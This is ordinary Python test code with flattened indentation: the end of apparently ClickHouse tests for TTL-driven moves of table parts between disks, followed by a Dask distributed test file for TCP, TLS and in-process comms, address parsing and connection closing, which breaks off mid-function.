assert set(used_disks) == {"jbod1"}
assert "1" == node1.query("SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
wait_expire_1_thread.join()
time.sleep(wait_expire_2/2)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "14"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.parametrize("name,engine,positive,bar", [
("mt_test_moves_after_alter_do_not_work","MergeTree()",0,"DELETE"),
("replicated_mt_test_moves_after_alter_do_not_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_alter_do_not_work', '1')",0,"DELETE"),
("mt_test_moves_after_alter_work","MergeTree()",1,"DELETE"),
("replicated_mt_test_moves_after_alter_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_alter_work', '1')",1,"DELETE"),
("mt_test_moves_after_alter_do_not_work","MergeTree()",0,"TO DISK 'external'"),
("replicated_mt_test_moves_after_alter_do_not_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_alter_do_not_work', '1')",0,"TO DISK 'external'"),
("mt_test_moves_after_alter_work","MergeTree()",1,"TO DISK 'external'"),
("replicated_mt_test_moves_after_alter_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_alter_work', '1')",1,"TO DISK 'external'"),
])
def test_ttls_do_not_work_after_alter(started_cluster, name, engine, positive, bar):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
if positive:
node1.query("""
ALTER TABLE {name}
MODIFY TTL
d1 + INTERVAL 15 MINUTE {bar}
""".format(name=name, bar=bar)) # That shall disable TTL.
data = [] # 10MB in total
for i in range(10):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time.time()-1))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1" if positive else "external"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.parametrize("name,engine", [
("mt_test_materialize_ttl_in_partition","MergeTree()"),
("replicated_mt_test_materialize_ttl_in_partition","ReplicatedMergeTree('/clickhouse/test_materialize_ttl_in_partition', '1')"),
])
def test_materialize_ttl_in_partition(started_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
p1 Int8,
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY p1
PARTITION BY p1
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
data = [] # 5MB in total
for i in range(5):
data.append((str(i), "'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time.time()-1))) # 1MB row
node1.query("INSERT INTO {} (p1, s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
time.sleep(0.5)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
node1.query("""
ALTER TABLE {name}
MODIFY TTL
d1 TO DISK 'external' SETTINGS materialize_ttl_after_modify = 0
""".format(name=name))
time.sleep(0.5)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
node1.query("""
ALTER TABLE {name}
MATERIALIZE TTL IN PARTITION 2
""".format(name=name))
node1.query("""
ALTER TABLE {name}
MATERIALIZE TTL IN PARTITION 4
""".format(name=name))
time.sleep(0.5)
used_disks_sets = []
for i in range(len(data)):
used_disks_sets.append(set(get_used_disks_for_table(node1, name, partition=i)))
assert used_disks_sets == [{"jbod1"}, {"jbod1"}, {"external"}, {"jbod1"}, {"external"}]
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == str(len(data))
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_alter_multiple_ttls_positive", "MergeTree()", True),
("mt_replicated_test_alter_multiple_ttls_positive", "ReplicatedMergeTree('/clickhouse/replicated_test_alter_multiple_ttls_positive', '1')", True),
("mt_test_alter_multiple_ttls_negative", "MergeTree()", False),
("mt_replicated_test_alter_multiple_ttls_negative", "ReplicatedMergeTree('/clickhouse/replicated_test_alter_multiple_ttls_negative', '1')", False),
])
def test_alter_multiple_ttls(started_cluster, name, engine, positive):
"""Copyright 2019, Altinity LTD
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
"""Check that when multiple TTL expressions are set
and before any parts are inserted the TTL expressions
are changed with ALTER command then all old
TTL expressions are removed and the
the parts are moved to the specified disk or volume or
deleted if the new TTL expression is triggered
and are not moved or deleted when it is not.
"""
now = time.time()
try:
node1.query("""
CREATE TABLE {name} (
p1 Int64,
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY p1
TTL d1 + INTERVAL 34 SECOND TO DISK 'jbod2',
d1 + INTERVAL 64 SECOND TO VOLUME 'external'
SETTINGS storage_policy='jbods_with_external', merge_with_ttl_timeout=0
""".format(name=name, engine=engine))
node1.query("""
ALTER TABLE {name} MODIFY
TTL d1 + INTERVAL 0 SECOND TO DISK 'jbod2',
d1 + INTERVAL 14 SECOND TO VOLUME 'external',
d1 + INTERVAL 19 SECOND DELETE
""".format(name=name))
for p in range(3):
data = [] # 6MB in total
now = time.time()
for i in range(2):
p1 = p
s1 = get_random_string(1024 * 1024) # 1MB
d1 = now - 1 if i > 0 or positive else now + 300
data.append("({}, '{}', toDateTime({}))".format(p1, s1, d1))
node1.query("INSERT INTO {name} (p1, s1, d1) VALUES {values}".format(name=name, values=",".join(data)))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod2"} if positive else {"jbod1", "jbod2"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).splitlines() == ["6"]
if positive:
expected_disks = {"external"}
else:
expected_disks = {"jbod1", "jbod2"}
check_used_disks_with_retry(node1, name, expected_disks, 50)
assert node1.query("SELECT count() FROM {name}".format(name=name)).splitlines() == ["6"]
time.sleep(5)
for i in range(50):
rows_count = int(node1.query("SELECT count() FROM {name}".format(name=name)).strip())
if positive:
if rows_count == 0:
break
else:
if rows_count == 3:
break
node1.query("OPTIMIZE TABLE {name} FINAL".format(name=name))
time.sleep(0.5)
if positive:
assert rows_count == 0
else:
assert rows_count == 3
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
@pytest.mark.parametrize("name,engine", [
("concurrently_altering_ttl_mt","MergeTree()"),
("concurrently_altering_ttl_replicated_mt","ReplicatedMergeTree('/clickhouse/concurrently_altering_ttl_replicated_mt', '1')",),
])
def test_concurrent_alter_with_ttl_move(started_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
EventDate Date,
number UInt64
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY toYYYYMM(EventDate)
SETTINGS storage_policy='jbods_with_external'
""".format(name=name, engine=engine))
values = list({ random.randint(1, 1000000) for _ in range(0, 1000) })
def insert(num):
for i in range(num):
day = random.randint(11, 30)
value = values.pop()
month = '0' + str(random.choice([3, 4]))
node1.query("INSERT INTO {} VALUES(toDate('2019-{m}-{d}'), {v})".format(name, m=month, d=day, v=value))
def alter_move(num):
def produce_alter_move(node, name):
move_type = random.choice(["PART", "PARTITION"])
if move_type == "PART":
for _ in range(10):
try:
parts = node1.query("SELECT name from system.parts where table = '{}' and active = 1".format(name)).strip().split('\n')
break
except QueryRuntimeException:
pass
else:
raise Exception("Cannot select from system.parts")
move_part = random.choice(["'" + part + "'" for part in parts])
else:
move_part = random.choice([201903, 201904])
move_disk = random.choice(["DISK", "VOLUME"])
if move_disk == "DISK":
move_volume = random.choice(["'external'", "'jbod1'", "'jbod2'"])
else:
move_volume = random.choice(["'main'", "'external'"])
try:
node1.query("ALTER TABLE {} MOVE {mt} {mp} TO {md} {mv}".format(
name, mt=move_type, mp=move_part, md=move_disk, mv=move_volume))
except QueryRuntimeException:
pass
for i in range(num):
produce_alter_move(node1, name)
def alter_update(num):
for i in range(num):
node1.query("ALTER TABLE {} UPDATE number = number + 1 WHERE 1".format(name))
def alter_modify_ttl(num):
for i in range(num):
ttls = []
for j in range(random.randint(1, 10)):
what = random.choice(["TO VOLUME 'main'", "TO VOLUME 'external'", "TO DISK 'jbod1'", "TO DISK 'jbod2'", "TO DISK 'external'"])
when = "now()+{}".format(random.randint(-1, 5))
ttls.append("{} {}".format(when, what))
try:
node1.query("ALTER TABLE {} MODIFY TTL {}".format(name, ", ".join(ttls)))
except QueryRuntimeException:
pass
def optimize_table(num):
for i in range(num):
try: # optimize may throw after concurrent alter
node1.query("OPTIMIZE TABLE {} FINAL".format(name))
except:
pass
p = Pool(15)
tasks = []
for i in range(5):
tasks.append(p.apply_async(insert, (100,)))
tasks.append(p.apply_async(alter_move, (100,)))
tasks.append(p.apply_async(alter_update, (100,)))
tasks.append(p.apply_async(alter_modify_ttl, (100,)))
tasks.append(p.apply_async(optimize_table, (100,)))
for task in tasks:
task.get(timeout=120)
assert node1.query("SELECT 1") == "1\n"
assert node1.query("SELECT COUNT() FROM {}".format(name)) == "500\n"
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
@pytest.mark.skip(reason="Flacky test")
@pytest.mark.parametrize("name,positive", [
("test_double_move_while_select_negative", 0),
("test_double_move_while_select_positive", 1),
])
def test_double_move_while_select(started_cluster, name, positive):
try:
node1.query("""
CREATE TABLE {name} (
n Int64,
s String
) ENGINE = MergeTree
ORDER BY tuple()
PARTITION BY n
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name))
node1.query("INSERT INTO {name} VALUES (1, '{string}')".format(name=name, string=get_random_string(10 * 1024 * 1024)))
parts = node1.query("SELECT name FROM system.parts WHERE table = '{name}' AND active = 1".format(name=name)).splitlines()
assert len(parts) == 1
node1.query("ALTER TABLE {name} MOVE PART '{part}' TO DISK 'external'".format(name=name, part=parts[0]))
def long_select():
if positive:
node1.query("SELECT sleep(3), sleep(2), sleep(1), n FROM {name}".format(name=name))
thread = threading.Thread(target=long_select)
thread.start()
time.sleep(1)
node1.query("ALTER TABLE {name} MOVE PART '{part}' TO DISK 'jbod1'".format(name=name, part=parts[0]))
# Fill jbod1 to force ClickHouse to make move of partition 1 to external.
node1.query("INSERT INTO {name} VALUES (2, '{string}')".format(name=name, string=get_random_string(9 * 1024 * 1024)))
node1.query("INSERT INTO {name} VALUES (3, '{string}')".format(name=name, string=get_random_string(9 * 1024 * 1024)))
node1.query("INSERT INTO {name} VALUES (4, '{string}')".format(name=name, string=get_random_string(9 * 1024 * 1024)))
time.sleep(1)
# If SELECT locked old part on external, move shall fail.
assert node1.query("SELECT disk_name FROM system.parts WHERE table = '{name}' AND active = 1 AND name = '{part}'"
.format(name=name, part=parts[0])).splitlines() == ["jbod1" if positive else "external"]
thread.join()
assert node1.query("SELECT n FROM {name} ORDER BY n".format(name=name)).splitlines() == ["1", "2", "3", "4"]
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
|
test_comms.py
|
from __future__ import print_function, division, absolute_import
from functools import partial
import os
import sys
import threading
import warnings
import pytest
from tornado import gen, ioloop, locks, queues
from tornado.concurrent import Future
from distributed.compatibility import PY3
from distributed.metrics import time
from distributed.utils import get_ip, get_ipv6
from distributed.utils_test import (gen_test, requires_ipv6, has_ipv6,
get_cert, get_server_ssl_context,
get_client_ssl_context)
from distributed.utils_test import loop # noqa: F401
from distributed.protocol import (to_serialize, Serialized, serialize,
deserialize)
from distributed.comm import (tcp, inproc, connect, listen, CommClosedError,
parse_address, parse_host_port,
unparse_host_port, resolve_address,
get_address_host, get_local_address_for)
EXTERNAL_IP4 = get_ip()
if has_ipv6():
with warnings.catch_warnings(record=True):
warnings.simplefilter('always')
EXTERNAL_IP6 = get_ipv6()
ca_file = get_cert('tls-ca-cert.pem')
# The Subject field of our test certs
cert_subject = (
(('countryName', 'XY'),),
(('localityName', 'Dask-distributed'),),
(('organizationName', 'Dask'),),
(('commonName', 'localhost'),)
)
def check_tls_extra(info):
assert isinstance(info, dict)
assert info['peercert']['subject'] == cert_subject
assert 'cipher' in info
cipher_name, proto_name, secret_bits = info['cipher']
# Most likely
assert 'AES' in cipher_name
assert 'TLS' in proto_name
assert secret_bits >= 128
tls_kwargs = dict(listen_args={'ssl_context': get_server_ssl_context()},
connect_args={'ssl_context': get_client_ssl_context()})
@gen.coroutine
def get_comm_pair(listen_addr, listen_args=None, connect_args=None,
**kwargs):
q = queues.Queue()
def handle_comm(comm):
q.put(comm)
listener = listen(listen_addr, handle_comm,
connection_args=listen_args, **kwargs)
listener.start()
comm = yield connect(listener.contact_address,
connection_args=connect_args, **kwargs)
serv_comm = yield q.get()
raise gen.Return((comm, serv_comm))
def get_tcp_comm_pair(**kwargs):
return get_comm_pair('tcp://', **kwargs)
def get_tls_comm_pair(**kwargs):
kwargs.update(tls_kwargs)
return get_comm_pair('tls://', **kwargs)
def get_inproc_comm_pair(**kwargs):
return get_comm_pair('inproc://', **kwargs)
@gen.coroutine
def debug_loop():
"""
Debug helper
"""
while True:
loop = ioloop.IOLoop.current()
print('.', loop, loop._handlers)
yield gen.sleep(0.50)
#
# Test utility functions
#
def test_parse_host_port():
f = parse_host_port
assert f('localhost:123') == ('localhost', 123)
assert f('127.0.0.1:456') == ('127.0.0.1', 456)
assert f('localhost:123', 80) == ('localhost', 123)
assert f('localhost', 80) == ('localhost', 80)
with pytest.raises(ValueError):
f('localhost')
assert f('[::1]:123') == ('::1', 123)
assert f('[fe80::1]:123', 80) == ('fe80::1', 123)
assert f('[::1]', 80) == ('::1', 80)
with pytest.raises(ValueError):
f('[::1]')
with pytest.raises(ValueError):
f('::1:123')
with pytest.raises(ValueError):
f('::1')
def test_unparse_host_port():
f = unparse_host_port
assert f('localhost', 123) == 'localhost:123'
assert f('127.0.0.1', 123) == '127.0.0.1:123'
assert f('::1', 123) == '[::1]:123'
assert f('[::1]', 123) == '[::1]:123'
assert f('127.0.0.1') == '127.0.0.1'
assert f('127.0.0.1', 0) == '127.0.0.1'
assert f('127.0.0.1', None) == '127.0.0.1'
assert f('127.0.0.1', '*') == '127.0.0.1:*'
assert f('::1') == '[::1]'
assert f('[::1]') == '[::1]'
assert f('::1', '*') == '[::1]:*'
def test_get_address_host():
f = get_address_host
assert f('tcp://127.0.0.1:123') == '127.0.0.1'
assert f('inproc://%s/%d/123' % (get_ip(), os.getpid())) == get_ip()
def test_resolve_address():
f = resolve_address
assert f('tcp://127.0.0.1:123') == 'tcp://127.0.0.1:123'
assert f('127.0.0.2:789') == 'tcp://127.0.0.2:789'
assert f('tcp://0.0.0.0:456') == 'tcp://0.0.0.0:456'
assert f('tcp://0.0.0.0:456') == 'tcp://0.0.0.0:456'
if has_ipv6():
assert f('tcp://[::1]:123') == 'tcp://[::1]:123'
assert f('tls://[::1]:123') == 'tls://[::1]:123'
# OS X returns '::0.0.0.2' as canonical representation
assert f('[::2]:789') in ('tcp://[::2]:789',
'tcp://[::0.0.0.2]:789')
assert f('tcp://[::]:123') == 'tcp://[::]:123'
assert f('localhost:123') == 'tcp://127.0.0.1:123'
assert f('tcp://localhost:456') == 'tcp://127.0.0.1:456'
assert f('tls://localhost:456') == 'tls://127.0.0.1:456'
def test_get_local_address_for():
f = get_local_address_for
assert f('tcp://127.0.0.1:80') == 'tcp://127.0.0.1'
assert f('tcp://8.8.8.8:4444') == 'tcp://' + get_ip()
if has_ipv6():
assert f('tcp://[::1]:123') == 'tcp://[::1]'
inproc_arg = 'inproc://%s/%d/444' % (get_ip(), os.getpid())
inproc_res = f(inproc_arg)
assert inproc_res.startswith('inproc://')
assert inproc_res != inproc_arg
#
# Test concrete transport APIs
#
@gen_test()
def test_tcp_specific():
"""
Test concrete TCP API.
"""
@gen.coroutine
def handle_comm(comm):
assert comm.peer_address.startswith('tcp://' + host)
assert comm.extra_info == {}
msg = yield comm.read()
msg['op'] = 'pong'
yield comm.write(msg)
yield comm.close()
listener = tcp.TCPListener('localhost', handle_comm)
listener.start()
host, port = listener.get_host_port()
assert host in ('localhost', '127.0.0.1', '::1')
assert port > 0
connector = tcp.TCPConnector()
l = []
@gen.coroutine
def client_communicate(key, delay=0):
addr = '%s:%d' % (host, port)
comm = yield connector.connect(addr)
assert comm.peer_address == 'tcp://' + addr
assert comm.extra_info == {}
yield comm.write({'op': 'ping', 'data': key})
if delay:
yield gen.sleep(delay)
msg = yield comm.read()
assert msg == {'op': 'pong', 'data': key}
l.append(key)
yield comm.close()
yield client_communicate(key=1234)
# Many clients at once
N = 100
futures = [client_communicate(key=i, delay=0.05) for i in range(N)]
yield futures
assert set(l) == {1234} | set(range(N))
@gen_test()
def test_tls_specific():
"""
Test concrete TLS API.
"""
@gen.coroutine
def handle_comm(comm):
assert comm.peer_address.startswith('tls://' + host)
check_tls_extra(comm.extra_info)
msg = yield comm.read()
msg['op'] = 'pong'
yield comm.write(msg)
yield comm.close()
server_ctx = get_server_ssl_context()
client_ctx = get_client_ssl_context()
listener = tcp.TLSListener('localhost', handle_comm,
ssl_context=server_ctx)
listener.start()
host, port = listener.get_host_port()
assert host in ('localhost', '127.0.0.1', '::1')
assert port > 0
connector = tcp.TLSConnector()
l = []
@gen.coroutine
def client_communicate(key, delay=0):
addr = '%s:%d' % (host, port)
comm = yield connector.connect(addr, ssl_context=client_ctx)
assert comm.peer_address == 'tls://' + addr
check_tls_extra(comm.extra_info)
yield comm.write({'op': 'ping', 'data': key})
if delay:
yield gen.sleep(delay)
msg = yield comm.read()
assert msg == {'op': 'pong', 'data': key}
l.append(key)
yield comm.close()
yield client_communicate(key=1234)
# Many clients at once
N = 100
futures = [client_communicate(key=i, delay=0.05) for i in range(N)]
yield futures
assert set(l) == {1234} | set(range(N))
@gen_test()
def test_comm_failure_threading():
"""
When we fail to connect, make sure we don't make a lot
of threads.
We only assert for PY3, because the thread limit only is
set for python 3. See github PR #2403 discussion for info.
"""
@gen.coroutine
def sleep_for_60ms():
max_thread_count = 0
for x in range(60):
yield gen.sleep(0.001)
thread_count = threading.active_count()
if thread_count > max_thread_count:
max_thread_count = thread_count
raise gen.Return(max_thread_count)
original_thread_count = threading.active_count()
# tcp.TCPConnector()
sleep_future = sleep_for_60ms()
with pytest.raises(IOError):
yield connect("tcp://localhost:28400", 0.052)
max_thread_count = yield sleep_future
# 2 is the number set by BaseTCPConnector.executor (ThreadPoolExecutor)
if PY3:
assert max_thread_count <= 2 + original_thread_count
# tcp.TLSConnector()
sleep_future = sleep_for_60ms()
with pytest.raises(IOError):
yield connect("tls://localhost:28400", 0.052,
connection_args={'ssl_context': get_client_ssl_context()})
max_thread_count = yield sleep_future
if PY3:
assert max_thread_count <= 2 + original_thread_count
@gen.coroutine
def check_inproc_specific(run_client):
"""
Test concrete InProc API.
"""
listener_addr = inproc.global_manager.new_address()
addr_head = listener_addr.rpartition('/')[0]
client_addresses = set()
N_MSGS = 3
@gen.coroutine
def handle_comm(comm):
assert comm.peer_address.startswith('inproc://' + addr_head)
client_addresses.add(comm.peer_address)
for i in range(N_MSGS):
msg = yield comm.read()
msg['op'] = 'pong'
yield comm.write(msg)
yield comm.close()
listener = inproc.InProcListener(listener_addr, handle_comm)
listener.start()
assert listener.listen_address == listener.contact_address == 'inproc://' + listener_addr
connector = inproc.InProcConnector(inproc.global_manager)
l = []
@gen.coroutine
def client_communicate(key, delay=0):
comm = yield connector.connect(listener_addr)
assert comm.peer_address == 'inproc://' + listener_addr
for i in range(N_MSGS):
yield comm.write({'op': 'ping', 'data': key})
if delay:
yield gen.sleep(delay)
msg = yield comm.read()
assert msg == {'op': 'pong', 'data': key}
l.append(key)
with pytest.raises(CommClosedError):
yield comm.read()
yield comm.close()
client_communicate = partial(run_client, client_communicate)
yield client_communicate(key=1234)
# Many clients at once
N = 20
futures = [client_communicate(key=i, delay=0.001) for i in range(N)]
yield futures
assert set(l) == {1234} | set(range(N))
assert len(client_addresses) == N + 1
assert listener.contact_address not in client_addresses
def run_coro(func, *args, **kwargs):
return func(*args, **kwargs)
def run_coro_in_thread(func, *args, **kwargs):
fut = Future()
main_loop = ioloop.IOLoop.current()
def run():
thread_loop = ioloop.IOLoop() # need fresh IO loop for run_sync()
try:
res = thread_loop.run_sync(partial(func, *args, **kwargs),
timeout=10)
except Exception:
main_loop.add_callback(fut.set_exc_info, sys.exc_info())
else:
main_loop.add_callback(fut.set_result, res)
finally:
thread_loop.close()
t = threading.Thread(target=run)
t.start()
return fut
@gen_test()
def test_inproc_specific_same_thread():
yield check_inproc_specific(run_coro)
@gen_test()
def test_inproc_specific_different_threads():
yield check_inproc_specific(run_coro_in_thread)
#
# Test communications through the abstract API
#
@gen.coroutine
def check_client_server(addr, check_listen_addr=None, check_contact_addr=None,
listen_args=None, connect_args=None):
"""
Abstract client / server test.
"""
@gen.coroutine
def handle_comm(comm):
scheme, loc = parse_address(comm.peer_address)
assert scheme == bound_scheme
msg = yield comm.read()
assert msg['op'] == 'ping'
msg['op'] = 'pong'
yield comm.write(msg)
msg = yield comm.read()
assert msg['op'] == 'foobar'
yield comm.close()
# Arbitrary connection args should be ignored
listen_args = listen_args or {'xxx': 'bar'}
connect_args = connect_args or {'xxx': 'foo'}
listener = listen(addr, handle_comm, connection_args=listen_args)
listener.start()
# Check listener properties
bound_addr = listener.listen_address
bound_scheme, bound_loc = parse_address(bound_addr)
assert bound_scheme in ('inproc', 'tcp', 'tls')
assert bound_scheme == parse_address(addr)[0]
if check_listen_addr is not None:
check_listen_addr(bound_loc)
contact_addr = listener.contact_address
contact_scheme, contact_loc = parse_address(contact_addr)
assert contact_scheme == bound_scheme
if check_contact_addr is not None:
check_contact_addr(contact_loc)
else:
assert contact_addr == bound_addr
# Check client <-> server comms
l = []
@gen.coroutine
def client_communicate(key, delay=0):
comm = yield connect(listener.contact_address,
connection_args=connect_args)
assert comm.peer_address == listener.contact_address
yield comm.write({'op': 'ping', 'data': key})
yield comm.write({'op': 'foobar'})
if delay:
yield gen.sleep(delay)
msg = yield comm.read()
assert msg == {'op': 'pong', 'data': key}
l.append(key)
yield comm.close()
yield client_communicate(key=1234)
# Many clients at once
futures = [client_communicate(key=i, delay=0.05) for i in range(20)]
yield futures
assert set(l) == {1234} | set(range(20))
listener.stop()
def tcp_eq(expected_host, expected_port=None):
def checker(loc):
host, port = parse_host_port(loc)
assert host == expected_host
if expected_port is not None:
assert port == expected_port
else:
assert 1023 < port < 65536
return checker
tls_eq = tcp_eq
def inproc_check():
expected_ip = get_ip()
expected_pid = os.getpid()
def checker(loc):
ip, pid, suffix = loc.split('/')
assert ip == expected_ip
assert int(pid) == expected_pid
return checker
@gen_test()
def test_default_client_server_ipv4():
# Default scheme is (currently) TCP
yield check_client_server('127.0.0.1', tcp_eq('127.0.0.1'))
yield check_client_server('127.0.0.1:3201', tcp_eq('127.0.0.1', 3201))
yield check_client_server('0.0.0.0',
tcp_eq('0.0.0.0'), tcp_eq(EXTERNAL_IP4))
yield check_client_server('0.0.0.0:3202',
tcp_eq('0.0.0.0', 3202), tcp_eq(EXTERNAL_IP4, 3202))
# IPv4 is preferred for the bound address
yield check_client_server('',
tcp_eq('0.0.0.0'), tcp_eq(EXTERNAL_IP4))
yield check_client_server(':3203',
tcp_eq('0.0.0.0', 3203), tcp_eq(EXTERNAL_IP4, 3203))
@requires_ipv6
@gen_test()
def test_default_client_server_ipv6():
yield check_client_server('[::1]', tcp_eq('::1'))
yield check_client_server('[::1]:3211', tcp_eq('::1', 3211))
yield check_client_server('[::]', tcp_eq('::'), tcp_eq(EXTERNAL_IP6))
yield check_client_server('[::]:3212', tcp_eq('::', 3212), tcp_eq(EXTERNAL_IP6, 3212))
@gen_test()
def test_tcp_client_server_ipv4():
yield check_client_server('tcp://127.0.0.1', tcp_eq('127.0.0.1'))
yield check_client_server('tcp://127.0.0.1:3221', tcp_eq('127.0.0.1', 3221))
yield check_client_server('tcp://0.0.0.0',
tcp_eq('0.0.0.0'), tcp_eq(EXTERNAL_IP4))
yield check_client_server('tcp://0.0.0.0:3222',
tcp_eq('0.0.0.0', 3222), tcp_eq(EXTERNAL_IP4, 3222))
yield check_client_server('tcp://',
tcp_eq('0.0.0.0'), tcp_eq(EXTERNAL_IP4))
yield check_client_server('tcp://:3223',
tcp_eq('0.0.0.0', 3223), tcp_eq(EXTERNAL_IP4, 3223))
@requires_ipv6
@gen_test()
def test_tcp_client_server_ipv6():
yield check_client_server('tcp://[::1]', tcp_eq('::1'))
yield check_client_server('tcp://[::1]:3231', tcp_eq('::1', 3231))
yield check_client_server('tcp://[::]',
tcp_eq('::'), tcp_eq(EXTERNAL_IP6))
yield check_client_server('tcp://[::]:3232',
tcp_eq('::', 3232), tcp_eq(EXTERNAL_IP6, 3232))
@gen_test()
def test_tls_client_server_ipv4():
yield check_client_server('tls://127.0.0.1', tls_eq('127.0.0.1'), **tls_kwargs)
yield check_client_server('tls://127.0.0.1:3221', tls_eq('127.0.0.1', 3221), **tls_kwargs)
yield check_client_server('tls://', tls_eq('0.0.0.0'),
tls_eq(EXTERNAL_IP4), **tls_kwargs)
@requires_ipv6
@gen_test()
def test_tls_client_server_ipv6():
yield check_client_server('tls://[::1]', tls_eq('::1'), **tls_kwargs)
@gen_test()
def test_inproc_client_server():
yield check_client_server('inproc://', inproc_check())
yield check_client_server(inproc.new_address(), inproc_check())
#
# TLS certificate handling
#
@gen_test()
def test_tls_reject_certificate():
cli_ctx = get_client_ssl_context()
serv_ctx = get_server_ssl_context()
# These certs are not signed by our test CA
bad_cert_key = ('tls-self-signed-cert.pem', 'tls-self-signed-key.pem')
bad_cli_ctx = get_client_ssl_context(*bad_cert_key)
bad_serv_ctx = get_server_ssl_context(*bad_cert_key)
@gen.coroutine
def handle_comm(comm):
scheme, loc = parse_address(comm.peer_address)
assert scheme == 'tls'
yield comm.close()
# Listener refuses a connector not signed by the CA
listener = listen('tls://', handle_comm,
connection_args={'ssl_context': serv_ctx})
listener.start()
with pytest.raises(EnvironmentError) as excinfo:
yield connect(listener.contact_address, timeout=0.5,
connection_args={'ssl_context': bad_cli_ctx})
# The wrong error is reported on Python 2, see https://github.com/tornadoweb/tornado/pull/2028
if sys.version_info >= (3,) and os.name != 'nt':
try:
# See https://serverfault.com/questions/793260/what-does-tlsv1-alert-unknown-ca-mean
assert "unknown ca" in str(excinfo.value)
except AssertionError:
if os.name == 'nt':
assert "An existing connection was forcibly closed" in str(excinfo.value)
else:
raise
# Sanity check
comm = yield connect(listener.contact_address, timeout=0.5,
connection_args={'ssl_context': cli_ctx})
yield comm.close()
# Connector refuses a listener not signed by the CA
listener = listen('tls://', handle_comm,
connection_args={'ssl_context': bad_serv_ctx})
listener.start()
with pytest.raises(EnvironmentError) as excinfo:
yield connect(listener.contact_address, timeout=0.5,
connection_args={'ssl_context': cli_ctx})
# The wrong error is reported on Python 2, see https://github.com/tornadoweb/tornado/pull/2028
if sys.version_info >= (3,):
assert "certificate verify failed" in str(excinfo.value)
#
# Test communication closing
#
@gen.coroutine
def check_comm_closed_implicit(addr, delay=None, listen_args=None,
connect_args=None):
@gen.coroutine
def handle_comm(comm):
yield comm.close()
listener = listen(addr, handle_comm, connection_args=listen_args)
listener.start()
contact_addr = listener.contact_address
comm = yield connect(contact_addr, connection_args=connect_args)
with pytest.raises(CommClosedError):
yield comm.write({})
comm = yield connect(contact_addr, connection_args=connect_args)
with pytest.raises(CommClosedError):
yield comm.read()
@gen_test()
def test_tcp_comm_closed_implicit():
yield check_comm_closed_implicit('tcp://127.0.0.1')
@gen_test()
def test_tls_comm_closed_implicit():
yield check_comm_closed_implicit('tls://127.0.0.1', **tls_kwargs)
@gen_test()
def test_inproc_comm_closed_implicit():
yield check_comm_closed_implicit(inproc.new_address())
@gen.coroutine
def check_comm_closed_explicit(addr, listen_args=None, connect_args=None):
a, b = yield get_comm_pair(addr, listen_args=listen_args, connect_args=connect_args)
a_read = a.read()
b_read = b.read()
yield a.close()
# In-flight reads should abort with CommClosedError
with pytest.raises(CommClosedError):
yield a_read
with pytest.raises(CommClosedError):
yield b_read
# New reads as well
with pytest.raises(CommClosedError):
yield a.read()
with pytest.raises(CommClosedError):
yield b.read()
# And writes
with pytest.raises(CommClosedError):
yield a.write({})
with pytest.raises(CommClosedError):
yield b.write({})
yield b.close()
@gen_test()
def test_tcp_comm_closed_explicit():
yield check_comm_closed_explicit('tcp://127.0.0.1')
@gen_test()
def test_tls_comm_closed_explicit():
yield check_comm_closed_explicit('tls://127.0.0.1', **tls_kwargs)
@gen_test()
def test_inproc_comm_closed_explicit():
yield check_comm_closed_explicit(inproc.new_address())
@gen_test()
def test_inproc_comm_closed_explicit_2():
listener_errors = []
@gen.coroutine
def handle_comm(comm):
# Wait
try:
yield comm.read()
except CommClosedError:
assert comm.closed()
listener_errors.append(True)
else:
comm.close()
listener = listen('inproc://', handle_comm)
listener.start()
contact_addr = listener.contact_address
comm = yield connect(contact_addr)
comm.close()
assert comm.closed()
start = time()
while len(listener_errors) < 1:
assert time() < start + 1
yield gen.sleep(0.01)
assert len(listener_errors) == 1
with pytest.raises(CommClosedError):
yield comm.read()
with pytest.raises(CommClosedError):
yield comm.write("foo")
comm = yield connect(contact_addr)
comm.write("foo")
with pytest.raises(CommClosedError):
